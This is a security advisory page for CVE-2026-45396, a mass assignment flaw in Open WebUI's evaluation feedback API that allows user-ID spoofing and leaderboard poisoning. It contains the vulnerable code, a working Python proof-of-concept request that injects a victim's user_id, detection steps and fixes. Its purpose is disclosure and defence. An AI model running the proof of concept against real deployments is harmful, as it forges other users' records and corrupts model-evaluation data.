CVE-2026-45396: open-webui: mass assignment enables leaderboard poisoning

GHSA-rjmp-vjf2-qf4g MEDIUM
Published May 14, 2026
CISO Take

Open WebUI v0.9.2 exposes an authenticated mass assignment flaw in its model evaluation feedback API, where any logged-in user can forge feedback records attributed to arbitrary colleagues—including administrators—by injecting extra fields that Pydantic's extra='allow' configuration willingly accepts, combined with a dict merge order that lets attacker-supplied values silently overwrite server-enforced identity. The practical consequence is Elo leaderboard manipulation: a single malicious insider can inflate or deflate model ratings to steer organizational AI model selection decisions, with no visible audit trail distinguishing legitimate from injected feedback. CVSS scores this Medium (5.4) with no active exploitation or KEV listing, but the integrity risk is substantially higher for organizations using Open WebUI as a formal AI evaluation platform—corrupted benchmark data can directly influence which LLMs enter production, with downstream compliance and business risk. Patch to v0.9.5 immediately; the exploit requires only a valid account and a standard HTTP client, and no workaround is adequate without disabling the evaluation feature entirely.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

CVSS 5.4 Medium understates operational risk for organizations using Open WebUI for AI model governance and selection. Exploitation requires only a standard user account and a single crafted HTTP request—no special tooling, AI/ML knowledge, or elevated privileges needed. The absence of a public exploit or KEV listing reduces immediate mass-exploitation risk, but the low attack complexity makes this a realistic insider threat vector. The package carries 91 historical CVEs and a Package Risk Score of 38/100, indicating systemic security debt; this is the second mass assignment vulnerability from the same root cause class in consecutive releases. The silent, integrity-corrupting nature of the attack—fake records are indistinguishable from legitimate ones without forensic database queries—extends dwell time and complicates post-incident remediation of tainted evaluation data.

Attack Kill Chain

Initial Access
Attacker authenticates to Open WebUI with any valid standard user account, obtaining a Bearer token via the normal sign-in flow—no privilege escalation required.
AML.T0012
Exploitation
Attacker crafts a POST request to /api/v1/evaluations/feedback with injected user_id and version fields that overwrite server-enforced values due to FeedbackForm's extra='allow' configuration and the insecure dict merge order.
AML.T0049
Persistence
Attacker repeats injections across multiple sessions, accumulating falsified rating records attributed to victim users and gradually shifting Elo model rankings without triggering any automated alerts.
AML.T0031
Impact
Corrupted leaderboard data drives organizational AI model selection decisions based on manipulated metrics, while spoofed user attribution permanently taints compliance audit trails and governance evidence.
AML.T0048.001

What systems are affected?

Package Ecosystem Vulnerable Range Patched
open-webui pip < 0.9.5 0.9.5
136.3K Pushed 5d ago 75% patched ~4d to patch Full package profile →

Do you use open-webui? You're affected.

Severity & Risk

CVSS 3.1
5.4 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Trivial

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR Low
UI None
S Unchanged
C None
I Low
A Low

What should I do?

6 steps
  1. Patch immediately: upgrade open-webui to v0.9.5, which fixes both the extra='allow' misconfiguration and the insecure dict merge order.

  2. If patching is delayed, disable the evaluation and leaderboard feature in admin settings or restrict POST /api/v1/evaluations/feedback to trusted internal IPs via firewall or reverse proxy ACL.

  3. Detection: query the feedback table for records where user_id does not match the session token user at time of creation; cross-reference with authentication logs for inconsistencies.

  4. Review the admin export endpoint (GET /api/v1/evaluations/feedbacks/export) for anomalous user_id distributions—e.g., implausibly high feedback volumes attributed to senior accounts from a single originating session.

  5. Post-patch: treat all Elo leaderboard data generated under affected versions as untrusted; re-run evaluations before using results for governance or procurement decisions.

  6. Broader hygiene: audit all Pydantic models in your AI application stack for extra='allow' combined with server-trusted field patterns such as user_id, role, or version.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 12 - Record-keeping and logging Article 9 - Risk management system
ISO 42001
8.4 - AI system data management 9.1 - Monitoring, measurement, analysis and evaluation
NIST AI RMF
MANAGE 2.2 - Mechanisms to respond to and recover from AI risks
OWASP LLM Top 10
LLM04:2025 - Data and Model Poisoning

Frequently Asked Questions

What is CVE-2026-45396?

Open WebUI v0.9.2 exposes an authenticated mass assignment flaw in its model evaluation feedback API, where any logged-in user can forge feedback records attributed to arbitrary colleagues—including administrators—by injecting extra fields that Pydantic's extra='allow' configuration willingly accepts, combined with a dict merge order that lets attacker-supplied values silently overwrite server-enforced identity. The practical consequence is Elo leaderboard manipulation: a single malicious insider can inflate or deflate model ratings to steer organizational AI model selection decisions, with no visible audit trail distinguishing legitimate from injected feedback. CVSS scores this Medium (5.4) with no active exploitation or KEV listing, but the integrity risk is substantially higher for organizations using Open WebUI as a formal AI evaluation platform—corrupted benchmark data can directly influence which LLMs enter production, with downstream compliance and business risk. Patch to v0.9.5 immediately; the exploit requires only a valid account and a standard HTTP client, and no workaround is adequate without disabling the evaluation feature entirely.

Is CVE-2026-45396 actively exploited?

No confirmed active exploitation of CVE-2026-45396 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-45396?

1. Patch immediately: upgrade open-webui to v0.9.5, which fixes both the extra='allow' misconfiguration and the insecure dict merge order. 2. If patching is delayed, disable the evaluation and leaderboard feature in admin settings or restrict POST /api/v1/evaluations/feedback to trusted internal IPs via firewall or reverse proxy ACL. 3. Detection: query the feedback table for records where user_id does not match the session token user at time of creation; cross-reference with authentication logs for inconsistencies. 4. Review the admin export endpoint (GET /api/v1/evaluations/feedbacks/export) for anomalous user_id distributions—e.g., implausibly high feedback volumes attributed to senior accounts from a single originating session. 5. Post-patch: treat all Elo leaderboard data generated under affected versions as untrusted; re-run evaluations before using results for governance or procurement decisions. 6. Broader hygiene: audit all Pydantic models in your AI application stack for extra='allow' combined with server-trusted field patterns such as user_id, role, or version.

What systems are affected by CVE-2026-45396?

This vulnerability affects the following AI/ML architecture patterns: AI model evaluation platforms, LLM benchmarking and comparison systems, AI governance and compliance audit trails, Enterprise LLM selection workflows, Model serving.

What is the CVSS score for CVE-2026-45396?

CVE-2026-45396 has a CVSS v3.1 base score of 5.4 (MEDIUM).

Technical Details

NVD Description

# Mass Assignment in Feedback Creation Allows User ID Spoofing and Evaluation Data Manipulation ## Summary The `POST /api/v1/evaluations/feedback` endpoint in Open WebUI v0.9.2 is vulnerable to mass assignment via `FeedbackForm`, which uses `model_config = ConfigDict(extra='allow')`. Due to an insecure dictionary merge order in `insert_new_feedback()`, an authenticated attacker can inject a `user_id` field in the request body that overwrites the server-derived value, creating feedback records attributed to any arbitrary user. This corrupts the model evaluation leaderboard (Elo ratings) and enables identity spoofing. ## Details The vulnerability exists in two layers: ### 1. Model Layer — Insecure Dict Merge Order **File:** `backend/open_webui/models/feedbacks.py`, lines 148–160 ```python async def insert_new_feedback( self, user_id: str, form_data: FeedbackForm, db: Optional[AsyncSession] = None ) -> Optional[FeedbackModel]: async with get_async_db_context(db) as db: id = str(uuid.uuid4()) feedback = FeedbackModel( **{ 'id': id, 'user_id': user_id, # ← Server-set from auth token 'version': 0, **form_data.model_dump(), # ← OVERWRITES 'id', 'user_id', 'version' 'created_at': int(time.time()), 'updated_at': int(time.time()), } ) ``` In Python, when a dictionary literal contains duplicate keys, the **last value wins**. Since `**form_data.model_dump()` appears after `'user_id': user_id`, any `user_id` field in the form data overwrites the authenticated user's ID. ### 2. Schema Layer — `extra='allow'` on Request Form **File:** `backend/open_webui/models/feedbacks.py`, line 106 ```python class FeedbackForm(BaseModel): type: str data: Optional[RatingData] = None meta: Optional[dict] = None snapshot: Optional[SnapshotData] = None model_config = ConfigDict(extra='allow') # ← Accepts arbitrary extra fields ``` The `extra='allow'` config means Pydantic will accept and preserve any extra fields in the request body, including `user_id`, `id`, and `version`. These are then spread into the `FeedbackModel` constructor, overwriting server-set values. ### Contrast with Secure Pattern Other models in the same codebase use the correct ordering. For example, `backend/open_webui/models/functions.py`, line 120: ```python function = FunctionModel(**{ **form_data.model_dump(), # ← Spread FIRST 'user_id': user_id, # ← Server value AFTER → always wins }) ``` And `ModelForm` at `backend/open_webui/models/models.py` uses `extra='ignore'`, which is the strictest approach. ## Impact ### 1. User Identity Spoofing An attacker can create feedback records attributed to any user by specifying their `user_id`. The admin export endpoint (`GET /api/v1/evaluations/feedbacks/export`) and admin list (`GET /api/v1/evaluations/feedbacks/all`) will show the spoofed `user_id` as the feedback author. ### 2. Model Evaluation Leaderboard Manipulation The Elo rating system at `backend/open_webui/routers/evaluations.py` computes model rankings directly from feedback records. An attacker can inject fake rating feedback to: - Artificially inflate ratings for a specific model - Deflate ratings for competitor models - Make organizational model evaluation decisions unreliable ### 3. Record ID Control By injecting a custom `id`, an attacker controls the UUID of the feedback record. While this won't overwrite existing records (primary key constraint), it enables predictable record IDs that could be useful in other attack chains. ## PoC ```python import requests BASE_URL = "http://localhost:8080" # 1. Login as attacker session = requests.Session() login_resp = session.post(f"{BASE_URL}/api/v1/auths/signin", json={ "email": "attacker@example.com", "password": "attackerpass" }) token = login_resp.json()["token"] headers = {"Authorization": f"Bearer {token}"} # 2. Create feedback attributed to a different user (victim) VICTIM_USER_ID = "12345678-aaaa-bbbb-cccc-000000000000" resp = session.post( f"{BASE_URL}/api/v1/evaluations/feedback", headers=headers, json={ "type": "rating", "data": { "model_id": "gpt-4o", "rating": 1, "sibling_model_ids": ["claude-3-opus"], }, # Mass assignment: these extra fields are accepted due to extra='allow' # and overwrite server-set values due to dict merge order "user_id": VICTIM_USER_ID, # Overwrites authenticated user ID "version": 999, # Overwrites default version } ) feedback = resp.json() print(f"Feedback created with user_id: {feedback['user_id']}") # Expected: attacker's own user_id # Actual: VICTIM_USER_ID (12345678-aaaa-bbbb-cccc-000000000000) assert feedback["user_id"] == VICTIM_USER_ID, "Mass assignment successful!" ``` ## Severity **CVSS 3.1:** 5.4 (Medium) — `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L` - **Attack Vector:** Network - **Attack Complexity:** Low - **Privileges Required:** Low (any authenticated user) - **User Interaction:** None - **Impact:** Integrity (feedback data falsification) + limited Availability (leaderboard reliability) ## Suggested Remediation ### Option 1: Fix dict merge order (minimal fix) ```python feedback = FeedbackModel( **{ **form_data.model_dump(), # Spread FIRST 'id': id, # Server values AFTER (always win) 'user_id': user_id, 'version': 0, 'created_at': int(time.time()), 'updated_at': int(time.time()), } ) ``` ### Option 2: Remove `extra='allow'` from FeedbackForm (recommended) ```python class FeedbackForm(BaseModel): type: str data: Optional[RatingData] = None meta: Optional[dict] = None snapshot: Optional[SnapshotData] = None model_config = ConfigDict(extra='ignore') # Reject unexpected fields ``` ### Option 3: Explicit field assignment (most secure) ```python feedback = FeedbackModel( id=str(uuid.uuid4()), user_id=user_id, version=0, type=form_data.type, data=form_data.data.model_dump() if form_data.data else {}, meta=form_data.meta or {}, snapshot=form_data.snapshot.model_dump() if form_data.snapshot else {}, created_at=int(time.time()), updated_at=int(time.time()), ) ``` ## Affected Versions - v0.9.2 (current latest, confirmed vulnerable) - Likely all versions since feedback/evaluation feature was introduced ## References - Prior advisory: "Mass Assignment via Pydantic extra='allow' Allows Creating Folders in Other Users' Accounts" (patched in v0.9.0) — same root cause class, different endpoint

Exploitation Scenario

An insider at an enterprise deploying Open WebUI for formal AI model evaluation authenticates with their standard user account. Using curl or any HTTP client, they POST to /api/v1/evaluations/feedback with their valid Bearer token, injecting a user_id field pointing to the CISO's account and inflated ratings for a specific model. Because FeedbackForm accepts extra fields and the server dict merge is ordered incorrectly, the record is stored as if submitted by the CISO. Repeated across dozens of evaluations over weeks, this shifts Elo scores enough to make a specific LLM appear to be the consensus top performer among senior stakeholders. When leadership reviews the evaluation dashboard to select an enterprise LLM for a regulated use case, the manipulated scores drive adoption of the attacker's preferred model—potentially one with weaker safety controls—bypassing the organization's AI governance controls with no visible indicator of tampering.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Timeline

Published
May 14, 2026
Last Modified
May 14, 2026
First Seen
May 15, 2026

Related Vulnerabilities